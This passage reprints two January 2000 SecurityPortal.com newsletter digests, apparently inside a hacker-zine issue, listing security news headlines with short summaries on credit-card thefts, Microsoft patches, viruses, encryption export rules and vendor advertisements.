Circle Tightens Around Online Credit Card Thief <http://www.internetnews.com/ec-news/article/0,1087,4_281801,00.html> - Law enforcement officials may be closing in on Maxus, the Russian cracker who stole 300,000 credit card numbers from e-tailer CD Universe last month and dispensed them for free to visitors of his Web site Microsoft Bulletin: Patch Available for Spoofed LPC Port Request Vulnerability <http://securityportal.com/topnews/ms00-003.html> - The LPC vulnerability could allow a user logged onto a Windows NT 4.0 machine from the keyboard to become an administrator on the machine Yahoo: NSA Selects Secure Computing to Provide Type Enforcement on Linux <http://biz.yahoo.com/prnews/000113/ca_secure__1.html> - Secure Computing Corporation today announced that it has been awarded a sole source contract by the National Security Agency (NSA) to develop a Secure Linux Operating System (OS). This contract calls for Secure Computing to apply its patented Type Enforcement(TM) technology, to develop a robust and secure Linux platform. This award furthers the goal of Secure to pursue and acquire contracts that will provide enabling technologies to both the Federal government infrastructure as well as commercial electronic business applications ComputerWorld: Teens steal thousands of Net accounts <http://www.computerworld.com/home/print.nsf/idgnet/000113DD2E> - 2000 A group of teen-age computer crackers allegedly used thousands of stolen Internet accounts to probe the networks of two national nuclear weapons laboratories, according to law enforcement authorities in California Commerce Announces Streamlined Encryption Export Regulations <http://204.193.246.62/public.nsf/docs/60D6B47456BB389F852568640078B6C0> - The U.S. Department of Commerce Bureau of Export Administration (BXA) today issued new encryption export regulations which implement the new approach announced by the Clinton Administration in September InfoWorld: Oracle turns focus to security with Release 2 of 8i database <http://infoworld.com/articles/ec/xml/00/01/12/000112ecoracle.xml> - With an eye on the complex security needs of large electronic-commerce sites, Oracle next week will introduce Release 2 of its flagship database, Oracle 8i, at the RSA Conference 2000 in San Jose, Calif FCW: Army establishes Infowar DMZ <http://www.fcw.com/fcw/articles/web-dmz-01-12-00.asp> - The Army plans to establish network security demilitarized zones (DMZs) at all its bases worldwide as part of a plan to beef up its cyberdefenses against network intrusions and attacks Jan 12, 2000 FSecure: First Windows 2000 Virus Found <http://www.fsecure.com/news/2000/20000112.html> - F-Secure Corporation, a leading provider of centrally-managed, widely distributed security solutions, today announced the discovery of the first Windows 2000 virus. Windows 2000 is the upcoming new operating system from Microsoft, due to be released later this year. The new virus is called Win2K.Inta or Win2000.Install. It appears to be written by the 29A virus group. It operates only under Windows 2000 and is not designed to operate at all under older versions of Windows Kurt's Closet: Some thoughts on (network) intrusion detection systems <http://securityportal.com/direct.cgi?/closet/closet20000112.html> - Kurt makes the case for the necessity of emulated intelligence within intrusion detection systems and reviews some current research projects in this field RSA and Lotus Team to Provide Integrated Security for Lotus Notes and Domino R5 <http://www.rsasecurity.com/news/pr/000111-3.html> - Lotus to integrate RSA's KEON public key infrastructure software into Notes and Domino R5 ZDNet: Data thief threatens to strike again <http://www.zdnet.com/zdnn/stories/news/0,4586,2420863,00.html?chkpt=zdhpnew s01> - An e-mail author claiming to be the thief who released as many as 25,000 stolen credit card numbers earlier this month told NBC News he'll soon start distributing more card numbers on a new Web site Wired: Domains Hijacked from NSI <http://www.wired.com/news/politics/0,1283,33571,00.html> - Network Solutions' administrative policies are once again being blamed for Internet domain hijackings that took at least brief control over some major Web domains Jan 11, 2000 InternetNews: Cybercash Disputes Hacker's Claim <http://www.internetnews.com/ec-news/article/0,1087,4_279541,00.html> - Cybercash Inc. is disputing an 18-year-old Russian cracker's claims that the company's credit card verification system was penetrated, resulting in the theft of thousands of credit card numbers from an online music store FoxNews: Designed for Destruction <http://www.foxnews.com/vtech/011000/virus.sml> - Deliberately destructive viruses are on an upward trend, according to Symantec's Antivirus Research Center (SARC). Approximately 10 percent of 1993 viruses were deliberately destructive, but in 1997 that number rose to 35 percent. Often masquerading as innocuous e-mail, games or even fixes to real problems like the Y2K bug, today's viruses are more insidious than their counterparts were only a few years ago Wired: Crack Exposes Holes in the Web <http://www.wired.com/news/technology/0,1282,33563,00.html> - There are Web site cracks, there are break-ins, and there are thefts. But now and then one rises above the fray to teach a sudden lesson about all things Internet NWFusion: Win 2000 VPN technology causes stir <http://www.nwfusion.com/news/2000/0110vpn.html> - When it ships next month, Microsoft's Windows 2000 will come with technology for setting up an IP Security-based virtual private network. The question is: Will established VPN products from other vendors work with Microsoft's technology? New Internet Explorer vulnerability discovered by Guninski <http://securityportal.com/list-archive/bugtraq/2000/Jan/0091.html> - Georgi Guninski posted a new advisory concerning a new IE 5 security vulnerablity - circumventing Cross-frame security policy and accessing the DOM of "old" documents. This vulnerability can potentially allow access to local data. No response from Microsoft yet Securing E-Business in the New Millennium <http://securityportal.com/direct.cgi?/topnews/ebusiness20000111.html> - this article states the real threat will continue to be from within, and provides advice on the primarily low tech preventative measures any organization should take Jan 10, 2000 Sophos: Virus found on magazine CD ROM <http://www.sophos.com/devreview.html> - The WM97/Ethan virus was accidentally distributed on the December 1999 cover CD ROM of Developers Review magazine. The CD ROM, entitled Bonus CD - Issue 13 - December 1999, contains one file infected by the WM97/Ethan virus: POPKIN\WHATSNEW.DOC Cisco: Field Notice: Cisco Secure PIX Firewall Software Version 4.43 Deferral <http://www.cisco.com/warp/public/770/fn10231.html> - Any PIX Firewall on which version 4.43 software is present will continuously reboot. No other released versions of PIX Firewall are affected ******* What's new with SecurityPortal.com ******* Email Bombing Denial of Service (DoS) attacks, strange variants in the computer crime arena, often occur without clear economic motive. Usually, they arise from anarchistic impulses within the computer underground. And, email bombing is one of the easiest DoS attacks for the Huns of the Internet to perfect. Read the story here <http://securityportal.com/direct.cgi?/topnews/ebomb20000114.html> . Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com <mailto:webmaster@securityportal.com> . Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com <mailto:jreavis@SecurityPortal.com> @HWA 17.0 Security Portal review Jan 24th ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******* Vendor Corner ******* Write Your Information Security Policies In A Day! INFORMATION SECURITY POLICIES MADE EASY is a kit, text and CD, of 1000+ already-written security policies by internationally-known consultant Charles Cresson Wood. ISPME has JUST BEEN UPDATED and is now available in Version 7! ISPME v7 is the most comprehensive collection of policies available covering the latest technology developments and infosec topics. Each of these policies is accompanied by commentary detailing policy intention, audience, and the circumstances where it applies. Save weeks of time and thousands of dollars developing policies for information security manuals, systems standards, etc. with no consultant fees. Visit us at http://www.baselinesoft.com <http://www.baselinesoft.com/> for more information. ******* What's new with SecurityPortal.com ******* The Clock Strikes Midnight for RSA In a date more feared by RSA Security than Y2K, the patent for the venerable RSA data encryption algorithm will expire on September 20th of this year. No longer will RSA be able to charge royalties for the algorithm, first published by Ron Rivest, Adi Shamir and Leonard Adelman in 1977 and patented in 1983. After patent expiration, the algorithm will become part of the public domain, and companies will be free to incorporate the algorithm into their products without paying RSA any type of royalty or licensing fee. Although the demise of a 17 year patent for widely used technology is a big deal, there is also a distinct possibility that, like Y2K, it will turn out to be a non-event due to the momentum of the established security industry. Read the full story here. <http://securityportal.com/direct.cgi?/cover/coverstory20000124.html> ******* Vendor Corner ******* NOW from Entrust Technologies: All the power of proven Entrust solutions in a managed service. With Entrust@YourService, you're choosing: * the leader in bringing trust to e-business * a solution that will evolve with your e-business needs * a single, reliable trust backbone for all that you do Entrust@YourService is the choice for companies like yours that need to secure e-business quickly and reliably - without losing focus on what you do best. Click for more info: http://www.entrust.com/choice2 <http://www.entrust.com/choice2> ******* Top News ******* January 24, 2000 Welcome to SecurityPortal.com - The focal point for security on the Net. Recent postings in our top news <http://www.securityportal.com/framesettopnews.html> : Jan 24, 2000 IDG: NEC to unveil world's strongest encryption system <http://www.idg.net/idgns/2000/01/21/NECToUnveilWorldsStrongestEncryption.sh tml> - NEC says it will unveil a new encryption technology on Monday that it claims to be the world's strongest ZDNet: Mitnick: I was manipulated <http://www.zdnet.com/zdnn/stories/news/0,4586,2425686,00.html?chkpt=zdnntop > - Just freed from prison Friday, notorious hacker Kevin Mitnick slammed prosecutors and a New York Times' reporter for allegedly treating him unjustly in the court and in the media over the past six years Jan 21, 2000 Microsoft: Patch Available for "RDISK Registry Enumeration File" Vulnerability <http://www.microsoft.com/Security/Bulletins/ms00-004.asp> - Microsoft has released a patch that eliminates a security vulnerability in an administrative utility that ships with Microsoft® Windows NT® 4.0, Terminal Server Edition. The utility creates a temporary file during execution that can contain security-sensitive information, but does not appropriately restrict access to it. As a result, a malicious user on the terminal server could read the file as it was being created. CNN: Microsoft vows security commitment on Windows 2000 <http://www.cnn.com/2000/TECH/computing/01/20/security.win2k.idg/index.html> - Microsoft is pledging a firm commitment to security with measures such as equipping its upcoming Windows 2000 operating system with 128-bit encryption and interacting with users and rival vendors to detect software breaches and bugs, a high-ranking company official said in a keynote speech at the RSA Conference 2000 show here Tuesday. iDEFENSE and Internet Security Systems Form Strategic Alliance <http://www.iss.net/cgi-bin/dbt-display.exe/db_data/press_rel/release/012100 142.plt> - Infrastructure Defense, Inc. (iDEFENSE), a leading intelligence and risk management consulting company, and Internet Security Systems (ISS) (Nasdaq: ISSX), a leading provider of security management solutions for e-business, announced today a strategic agreement to integrate iDEFENSE and ISS capabilities, providing customers with an expanded line of information security offerings. As a result of the agreement, iDEFENSE and ISS will share expertise, data and resources as well as resell each company's products and services to respective customers ZDNet: Hacker Mitnick to be released Friday <http://www.zdnet.com/zdnn/stories/news/0,4586,2425165,00.html?chkpt=zdhpnew s01> - Come Friday, for the first time since 1995, Kevin Mitnick will be free. Will he hack again? OpenBSD Security Advisory: procfs <http://www.openbsd.org/errata.html> - Systems running with procfs enabled and mounted are vulnerable to having the stderr output of setuid processes directed onto a pre-seeked descriptor onto the stack in their own procfs memory FreeBSD Security Advisory: make <http://www.fear.pl/advisory/fid1/main_eng.htm> - make uses the temporary file in an insecure way, repeatedly deleting and reusing the same file name for the entire life of the program. This makes it vulnerable to a race condition wherein a malicious user could observe the name of the temporary file being used, and replace the contents of a later instance of the file with her desired commands after the legitimate commands have been written Jan 20, 2000 Currents: Virus Attacks Cost 12Bil <http://www.currents.net/newstoday/00/01/20/news14.html> - Virus attacks cost organizations a total of $12.1 billion during 1999, according to a report released today. Released by Computer Economics, the report said that over the last three years there has been a major programming shift as viruses have become far more malicious and specifically designed for destruction and damage UnionTribune: Global Health hit by hacker <http://www.uniontrib.com/news/computing/20000120-0010_1b20health.html> - A Poway company selling health products over the Internet was the apparent victim of a "hacker," who took information containing customer names and credit-card numbers and posted them on a Web site. The incident occurred Monday when someone accessed a little-used Web site kept by Global Health Trax, posted information that had been deleted months ago, then tipped off a reporter for MSNBC about it Wired: Say Hello to the NSA <http://www.wired.com/news/politics/0,1283,33776,00.html> - It wasn't hard to do if you were at the RSA Security conference this week in San Jose. The National Security Agency was there, like any other exhibitor, to be seen and promote technology partnerships Microsoft Bulletin: Malformed Conversion Data Vulnerability <http://securityportal.com/topnews/ms00-002.html> - Microsoft has released a patch that eliminates a security vulnerability in a utility that converts Japanese, Korean and Chinese Microsoft Word 5 documents to more-recent formats. A patch is available for the buffer overflow problem Computer Currents: Symantec Gets Anti Virus Patent <http://www.computercurrents.com/newstoday/00/01/20/news3.html> - Symantec has announced that a key technology in its Striker anti-virus engine has been granted patent rights by the US Patent and Trademark office. The firm said that the next-generation technology enables the Striker engine to detect complex polymorphic, or self-mutating, viruses much more rapidly than traditional anti-virus engines Wired: Clinton Favors Computer Snooping <http://wired.com/news/business/0,1367,33779,00.html> - The Clinton administration wants to be able to send federal agents armed with search warrants into homes to copy encryption keys and implant secret back doors onto computers Computer Currents: Encryption Challenge Beaten <http://www.computercurrents.com/newstoday/00/01/19/news6.html> - A 56-bit security challenge laid down by CS Communication & Systemes in March, 1999, has been cracked in just two months by a team of students working with no less than 38,000 Internet users around the world TechWeb: Washington Rep: Encryption Rules Need Work <http://www.techweb.com/wire/story/TWB20000119S0013> - interview with Rep Bob Goodlatte. "We think it is almost, but not quite, a 180-degree turn from [previous policy]," Goodlatte said. "But the problem is the implementation of it. They've made the application process [for encryption export] complex and cumbersome." The Fastest Growing Crime in America: Identity Theft <http://securityportal.com/direct.cgi?/topnews/identity20000120.html> - One of the nation's fastest-growing crimes is identity theft. Using a variety of methods, criminals obtain key pieces of a person's identity and fraudulently use that information for various illegal reasons. Some law enforcement officials estimate about 3,000 cases of identity theft a day within the United States Jan 19, 2000 InformationWeek: Security Vendors Intro Wireless Tools <http://www.informationweek.com/story/IWK20000119S0002> - With the ongoing convergence of Internet and wireless devices such as cell phones and personal digital assistants, there's heightened awareness of security issues among vendors and customers. At the RSA 2000 Security Convention in San Jose, Calif., this week, vendors addressed the issue with a variety of new products and alliances InformationWeek: Cisco To Acquire Two VPN Vendors <http://www.informationweek.com/story/IWK20000119S0003> - Looking to give users options for building virtual private networks, Cisco Systems today disclosed plans to supplement its product portfolio by buying VPN vendors Altiga Networks and Compatible Systems for a combined 567 million in stock Canoe: Dodging a hack attack <http://www.canoe.ca/TechNews0001/19_connect.html> - Just how safe is your data on the Net? The stories are scary: Just before Christmas, a 14-year-old kid was arrested in Toronto after hacking a company's site and changing the passwords. He was arrested when he showed up to collect his $5,000 ransom. A couple of weeks later, a Russian hacker, 'Maxim,' held 300,000 credit card numbers hostage, demanding CDUniverse pay him US$100,000. To make good on his threat, he started posting the information publicly. So far, CDUniverse hasn't paid. And Monday, computer hackers vandalized the 'Thomas' Web site of the U.S. Library of Congress NAI: W32/Ska2K.worm virus, Risk Low <http://vil.nai.com/vil/wm10543.asp> - This edition of the worm is only a minor variation of the original first identified in February 1999. This worm is detected with current DAT files. The file may be received by email with a size of 10,000 bytes. The worm if run will patch WSOCK32.DLL to promote distribution by email on the host system if the email application supports SMTP email communication. If the host supports this environment, emails when sent from the host will be followed by a second message with the worm either attached or included as MIME TechWeb: Zero Knowledge Hires Open Source Guru <http://www.techweb.com/wire/story/TWB20000118S0027> - Mike Shaver, who headed developer relations for the Mozilla.org project, is joining Zero-Knowledge Systems, a Montreal company rolling out an identity-cloaking Internet service Kurt's Closet: SuSE Linux - a vendor gets security conscious <http://securityportal.com/direct.cgi?/closet/closet20000119.html> - a look at the built in security features of SuSE Linux, including an interview with SuSE security maven Marc Heuse MSNBC: "Smurf Attack" snarls web service in Seattle over the weekend <http://www.msnbc.com/local/king/483728.asp> - A "smurf" attack or series of attacks on an Internet service provider snarled Wide World Web traffic in as much as 70 percent of the region last weekend, operators of the service say. See http://securityportal.com/cover/coverstory19990531.html <http://securityportal.com/cover/coverstory19990531.html> to learn about Smurf Amplifier Attacks Jan 18, 2000 Response: Some thoughts on (network) intrusion detection systems <http://securityportal.com/direct.cgi?/closet/closet20000112-response.html> - Kurt Seifried responds to the article featured prominently at Linux Today questioning his analysis of the shortcomings of network-based intrusion detections. (How much confidence do you have in your ID tools?) Sophos: Guidelines for Safe Hex <http://www.sophos.com/virusinfo/articles/safehex.html> - As well as keeping your anti-virus software up to date there are other ways in which you can reduce the chances of virus infection inside your company. We list some of the guidelines you might like to consider for safer computing in your organisation TechnologyPost: Hackers target Visa, other big firms <http://www.technologypost.com/enterprise/DAILY/20000118105052617.asp?Sectio n=Main> - Visa International has confirmed British press reports at the weekend that its global network was sniffed by hackers or similar people unknown last summer, but that its security systems locked down the on-line sessions before any systems break-ins occurred Wired: Online Security Remains Elusive <http://www.wired.com/news/politics/0,1283,33569,00.html> - As e-business lights up the Web, the critical matter of data security is headed for center stage. There have been too many security failures in the past and it's going to get worse, said Paul Kocher, president and chief scientist for Cryptography Research FoxNews: Artificial Immunology <http://www.foxnews.com/vtech/011800/virus2.sml> - Protection and recovery efforts from hack attacks and viruses account for 2.5 percent - or 25 billion - of global spending on information technology each year. The costs are so high mainly due to labor-intensive data recovery and productivity loss from downed systems Sophos: WM97/Marker-BU a Word 97 macro virus <http://www.sophos.com/downloads/ide/> - WM97/Marker-BU is a variant of Marker-R with various changes, and has been seen in the wild. If the date is between 23rd and 31st of July the virus changes the Application.Caption from Microsoft Word to Happy Birthday Shankar-25th July. The world may Forget but not me. It then displays a message box asking Did You curse Shankar on his Birthday? If you answer Yes another message box appears saying Thank You! I love you. are u free tonight? However, if you click No a message box appears saying You are Heart Less. The virus then makes changes to the document summary TechWeb: Entrust Launches Security Outsourcing <http://www.techweb.com/wire/story/TWB20000118S0006> - Entrust, a provider of public key infrastructure and digital certificate security applications, on Monday unveiled plans to provide outsourced security services for business-to-business and business-to-consumer transactions, and said it has partnered with Cash Tax to host the service InfoWorld: Panelists debate the issues surrounding cryptography <http://www.infoworld.com/articles/ic/xml/00/01/17/000117iccrypto.xml> - Issues including ease of use, governmental regulations, and wireless systems will be at the forefront of the cryptography realm in upcoming years, a panel of specialists said Monday at the RSA Conference 2000 show. The panelists, with affiliations ranging from the Massachusetts Institute of Technology to Sun Microsystems, urged that a variety of actions be taken by the industry Wired: 56 a Bit Short of Secure <http://www.wired.com/news/technology/0,1282,33695,00.html> - The collective crackers of Distributed.net have knocked off another 56-bit encryption key, this time in just over two months InfoWorld: Verisign aims to secure wireless transactions <http://www.infoworld.com/articles/ic/xml/00/01/17/000117icverisign.xml> - At the RSA Conference 2000 show here on Monday, VeriSign unveiled a set of technologies, services, and alliances to promote trusted, wireless Internet commerce. Citing the growth in usage of wireless devices, VeriSign Vice President of Worldwide Marketing Richard Yanowitch said that the initiative is intended to provide a complete trust infrastructure to the wireless world PCWorld: The Web Is a Hacker's Playground <http://www.pcworld.com/current_issue/article/0,1212,14415,00.html> - Can the Net be crime-proofed? Not as long as there are sloppy programmers and clever cat burglars Microsoft Bulletin: Malformed RTF Control Word <http://securityportal.com/topnews/ms00-005.html> - The control information is specified via directives called control words. The default RTF reader that ships as part of many Windows platforms has an unchecked buffer in the portion of the reader that parses control words. If an RTF file contains a specially-malformed control word, it could cause the application to crash. A patch is available for this vulnerability, which can causes a Denial of Service condition in all Microsoft Operating Systems Jan 17, 2000 FCW: NSA grapples with Linux security <http://www.fcw.com/fcw/articles/web-nsalinux-01-17-00.asp> - The National Security Agency, the super-secret arm of the Defense Department responsible for signals intelligence and information systems security, last week tapped Secure Computing Corp. to develop a secure version of the Linux operating system IDG: Film studios bring claim against DVD hackers <http://www.idg.net/idgns/2000/01/17/FilmStudiosBringClaimAgainstDVD.shtml> - Eight major motion picture companies late last week filed injunction complaints in U.S. Federal Court against three alleged hackers to prevent them from publishing an unauthorized DVD de-encryption program on their Web sites ******* What's new with SecurityPortal.com ******* The Unbreakable Cipher: Why Not Just Stay With Perfection? John Savard gets under the covers of ciphers to explain why the market uses DES and RSA algorithms instead of the "perfect" cipher. Read the full story here. <http://securityportal.com/direct.cgi?/topnews/crypto20000119.html> Tell us how we are doing. Send any other questions or comments to webmaster@securityportal.com <mailto:webmaster@securityportal.com> . Jim Reavis SecurityPortal.com - The focal point for security on the Net jreavis@SecurityPortal.com <mailto:jreavis@SecurityPortal.com> @HWA 18.0 Security Portal Review Jan 31st ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ******* Vendor Corner ******* Sponsored by VeriSign - The Internet Trust Company Protect your servers with 128-bit SSL encryption today! Get VeriSign's FREE guide, "Securing Your Web Site for Business". It tells you everything you need to know about using SSL to encrypt your e-commerce transactions for serious online security. Click here! http://www.verisign.com/cgi-bin/go.cgi?a=n016001690008000 <http://www.verisign.com/cgi-bin/go.cgi?a=n016001690008000> ******* What's new with SecurityPortal.com ******* Information Warfare As the latest buzzword to succeed Y2K on the media's "terror throne," information warfare (IW), as a useful term, begs for realistic definition. No doubt, bin Laden can attack us. Graduate students at Cal Tech, MIT, or UCLA and tenth-graders at your local high school can also launch "volleys" against corporate America. How effective such invasions would be is the critical issue. In the Gulf War, Iraqi anti-aircraft batteries expended vast rounds against allied planes, and it was almost totally ineffective. Sheer bulk doesn't always equate to victory. Read the full story here. <http://securityportal.com/direct.cgi?/cover/coverstory20000131.html> A Practical Guide to Cryptography What is it, where do I get it and how do I use it? Kurt Seifried has developed a How-to for using cryptography with several operating systems. Find the guide here. <http://securityportal.com/research/cryptodocs/basic-book/index.html> ******* Vendor Corner ******* NOW from Entrust Technologies: All the power of proven Entrust solutions in a managed service. With Entrust@YourService, you're choosing: * the leader in bringing trust to e-business * a solution that will evolve with your e-business needs * a single, reliable trust backbone for all that you do Entrust@YourService is the choice for companies like yours that need to secure e-business quickly and reliably - without losing focus on what you do best. Click for more info: http://www.entrust.com/choice2 <http://www.entrust.com/choice2> ******* Top News ******* January 31, 2000 Welcome to SecurityPortal.com - The focal point for security on the Net. Recent postings in our top news <http://www.securityportal.com/framesettopnews.html> : Jan 31, 2000 ZDNet: What´s wrong with Microsoft security? <http://www.zdnet.com/zdnn/stories/comment/1,5859,2429536,00.html> - The term "Microsoft's latest security glitch" has become a cliche. But it didn't have to Jan 28, 2000 Wired: Fast, Simple ... and Vulnerable <http://www.wired.com/news/technology/0,1282,33972,00.html> - A online bank's opening has been marred by a glitch that let customers transfer money from any U.S. bank account. Anyone who knew what they were doing could move funds to an X.com bank account and then withdraw them ZDNet: Win2000 security hole a 'major threat' <http://www.zdnet.com/zdnn/stories/news/0,4586,2429334,00.html?chkpt=zdnntop > - Six banks and three major PC makers affected by bug that lets attackers view files stored on Microsoft Index Server. Microsoft issues patch. CNN: DoubleClick suit filed <http://cnnfn.com/2000/01/28/emerging_markets/wires/doubleclick_wg/> - Woman accuses Net advertising firm of privacy violations TechWeb: Axent To Develop Linux Firewall With Cobalt <http://www.techweb.com/wire/story/TWB20000127S0014> - E-security vendor Axent Technologies Thursday unveiled a partnership with Cobalt Networks under which the companies will produce a Linux firewall and virtual private network appliance for small to midsize companies, branch offices, and service providers ComputerWorld: Congress backs federal efforts on Y2K, is wary on security <http://www.computerworld.com/home/print.nsf/all/000127E416> - Fernando Burbano, the CIO at the U.S. Department of State, said federal agencies don't have the money to pursue critical infrastructure protection initiatives LinuxJournal: Crackers and Crackdowns <http://www2.linuxjournal.com/articles/culture/007.html> - DeCSS author Jon Lech Johansen's home was raided by special police forces at the whim of the Motion Picture Association, an organization which affectionately refers to itself as "a little State Department". Mercury Center: Student charged with hacking <http://www.mercurycenter.com/svtech/news/indepth/docs/hacker012700.htm> - A federal grand jury in San Jose on Wednesday indicted a former Princeton University student suspected of hacking into the computer system of a Palo Alto e-commerce company and stealing nearly 2,000 credit card numbers. InternetNews: Hackers Close Japanese Government Sites <http://www.internetnews.com/intl-news/article/hackers.html> - So far this week, hackers have made three successful attacks on the official Web sites of two Japanese government agencies, altering the agencies' homepages and possibly deleting government data. ZDNet: Smart card 'inventor' lands in jail <http://www.zdnet.com/zdnn/stories/news/0,4586,2428429,00.html> - Serge Humpich says he was wasn't really stealing subway tokens -- just testing his new invention. It could cost him seven years. Jan 27, 2000 Wired: U.S. to Push China on Encryption <http://www.wired.com/news/politics/0,1283,33950,00.html> - The United States will press China to explain new regulations on encryption technology at a meeting of economic leaders in Davos, Switzerland, U.S. Trade Representative Charlene Barshefsky said Thursday. TheRegister: New hack attack is greater threat than imagined <http://www.theregister.co.uk/000127-000005.html> - It was news a month ago; days later it vanished. The mainstream press may have forgotten it, but security specialists gathered in California last week for the sixth RSA Conference to consider the growing trend in malicious computer assaults called distributed denial of service (DDoS) attacks. Dealing with this sort of assault can be maddening for the primary victim. The clients from which the attack is launched are themselves intermediate victims who rarely know that their systems have been compromised. They are in diverse locations around the world, administered by people who speak different languages, making it nearly impossible for one victim to explain to another how to cope with the threat ZDNet: Does DoubleClick track too closely? <http://www.zdnet.com/zdnn/stories/news/0,4586,2428392,00.html?chkpt=zdnntop > - Many e-shoppers don't realize that companies like DoubleClick's Abacus Direct pick up your trail at one of their sites and follow it wherever you go vnunet: Visa strengthens network after number kidnap <http://www.vnunet.com/News/105782> - Last week a Visa spokesman admitted that hackers had penetrated its computer network last July, but stressed that they were detected almost immediately. The company has since hardened its systems and the hackers have not returned, he said TheRegister: New crypto technique beats current standard <http://www.theregister.co.uk/000127-000025.html> - Called Cipherunicorn-A, the technique creates a number of false keys in addition to the true encryption key, making it more difficult for potential intruders to crack. The approach should increase security while remaining compliant with the Data Encryption Standard (DES) introduced by the US Department of Commerce, a company spokesperson told The Register CNet: Corel hurries to fix Linux security hole <http://news.cnet.com/news/0-1003-200-1533081.html?tag=st.ne.1002.bgif.1003- 200-1533081> - Corel is working to patch a bug with its version of Linux that could let unauthorized users gain access to machines running Corel Linux, with a program called Corel Update ZDNet: Bernstein crypto case to be reheard <http://www.zdnet.com/zdnn/stories/news/0,4586,2428386,00.html?chkpt=zdhpnew s01> - A U.S. Appeals Court panel will reconsider an earlier ruling striking down export limits on computer data scrambling products in light of new export rules announced this month by the White House Microsoft Bulletin: Index Server <http://securityportal.com/topnews/ms00-006.html> - This patch eliminates two vulnerabilities whose only relationship is that both occur in Index Server. The first is the "Malformed Hit-Highlighting Argument" vulnerability. The second vulnerability involves the error message that is returned when a user requests a non-existent Internet Data Query file SCO Security Advisories: rtpm, scohelp <http://www.sco.com/security/> - patches are available for buffer overflow vulnerabilities in rtpm, scohelp CNN: Security improvements made at national labs <http://www.cnn.com/2000/US/01/26/nuclear.security.ap/index.html> - Security at nuclear weapons labs has made "monumental strides" in the past year, but computer protection is still not 100 percent, the Energy Department's top security official says. Jan 26, 2000 Wired: Echelon 'Proof' Discovered <http://wired.com/news/politics/0,1283,33891,00.html> - References to a project Echelon have been found for the first time in declassified National Security Agency documents, says the researcher who found them. Researcher claims there is no evidence over mis-use of the system Industry Standard: China Installs Net Secrecy Rules <http://www.thestandard.net/article/display/0,1151,9125,00.html> - China clamped new controls onto the Internet on Wednesday to stop Web sites from "leaking state secrets" and an official newspaper said curbs on news content were on the way BBC: Old computer viruses still bite <http://news.bbc.co.uk/hi/english/sci/tech/newsid_619000/619687.stm> - An analysis of the most common computer viruses of 1999 shows that although the threat of new self-propagating viruses is growing, older viruses are still very common. One boot sector virus, Form, is nearly a decade old but still appears in the top ten FCW: Clinton aides fight for cybersecurity bill <http://www.fcw.com/fcw/articles/2000/0124/web-securitybill-01-26-00.asp> - Senior Clinton administration officials are urging Congress to support a bill that would provide a defense against criminals who now have access to more secure communications thanks to new encryption export regulations released this month ZDNet: Scam tricks users into 'stealing' <http://www.zdnet.com/zdnn/stories/news/0,4586,2427490,00.html?chkpt=zdhpnew s01> - So just what do computer criminals do with stolen credit cards? How about tricking innocent electronics shoppers into stealing on their behalf? That's how at least one scam artist is playing the online credit card game, MSNBC has learned Why random numbers are important for security <http://securityportal.com/direct.cgi?/closet/closet20000126.html> - Modern computer security requires some level of encryption to be applied to various kinds of data, for example secure web transactions, or SSH. But something that often goes ignored is the fact that all good crypto relies on some degree of randomness, which if not fulfilled properly can lead to a significant loss in the strength of encryption Sophos: XM97/Divi-A Excel 97 Macro virus <http://www.sophos.com/virusinfo/analyses/xm97divia.html> - XM97/Divi-A is an Excel spreadsheet macro virus. It creates a file called BASE5874.XLS in the Excel template directory, and will infect other spreadsheets as they are opened or closed Caldera: Advisory number: CSSA-1999-039.0 Various security problems with majordomo <ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-1999-039.0.txt> - There are several bugs in majordomo that allow arbitrary users to execute commands with the privilege of majordomo. If the sendmail aliases file contains aliases that invoke majordomo, a compromise of additional system accounts is possible, which may further on lead to a root compromise. An immediate root exploit has not been found however Jan 25, 2000 MontrealGazette: How safe is voice mail? <http://www.montrealgazette.com/news/pages/000124/3483600.html> - When Steven Boudrias was charged recently with infiltrating the Montreal Urban Community police department's voice-mail system, the question blinking alongside the message light on most people's phones is how safe electronic call-answering really is Intelligence Gathering on the Net <http://securityportal.com/direct.cgi?/topnews/intell20000125.html> - Prerequisites for computer security professionals include a knowledge of networking, scripting languages, operating systems, and security countermeasures. High-level technical savvy marks the true professional; such expertise, however, carries a practitioner only so far. An effective professional also listens for what's coming down the track Fairfax: Big keys unlock door to strong encryption <http://www.it.fairfax.com.au/software/20000125/A39666-2000Jan21.html> - Australians will find it much easier to get strong cryptography protection for their on-line business activities following the United States Government's 14 January decision to liberalise its export restrictions HP Bulletin: Security Vulnerability with PMTU strategy <http://securityportal.com/topnews/hp20000124.html> - An HP-UX 10.30/11.00 system can be used as an IP traffic amplifier. Small amounts of inbound traffic can result in larger amounts of outbound traffic Sophos: WM97/Melissa-AK virus <http://www.sophos.com/virusinfo/analyses/wm97melissaak.html> - WM97/Melissa-AK is a variant of WM97/Melissa. It will attempt to email a copy of the infected document to the first 50 entries in the Outlook address book. If the current day of the month is equal to the current minute it will insert the phrase Symbytes Ver. 7.x mucking about..The Mahatma. into the active document Cisco: IPsec/CEF Software Defect on Route Switch Processors <http://www.cisco.com/warp/public/770/fn10611.shtml> - On all RSP and RSM processors, when an interface in the router is configured with an IPSec crypto map and the switching mode is Cisco Express Forwarding (CEF), the RSP and RSM will restart when it attempts to decrypt IPSec packets. Patch not yet available, workaround is to disable Cisco Express Forwarding Sunday Times: French spies listen in to British calls <http://www.sunday-times.co.uk/news/pages/Sunday-Times/stinwenws03006.html?9 99> - French intelligence is intercepting British businessmen's GSM calls after investing millions in satellite technology for its listening stations Computer Currents: Cybercrime Harder to Prosecute <http://www.computercurrents.com/newstoday/00/01/24/news2.html> - US Justice Department officials reportedly called computer crime a growing menace to corporations worldwide, and admitted that law enforcement agents face major hurdles in combating it ZDNet: Hackers impersonate AOL users <http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdhpnew s01> - Teenage hackers are pretending to be AOL users, then coercing friends into divulging personal information Jan 24, 2000 ABCNews: Law Enforcement Is Rushing to Catch the Online Crime Wave <http://abcnews.go.com/sections/us/DailyNews/cybercrime_part2.html> - From Web site hackers to child pornographers, credit card thieves and e-mail terrorists, crime online is mushrooming, says Schwartz. And the crime fighters are struggling to catch up Wired: More Bad News for DVD Hackers <http://www.wired.com/news/politics/0,1283,33845,00.html> - Judge William J. Elfving issued a preliminary injunction Friday ordering 21 defendants to stop posting code that breaks through the security 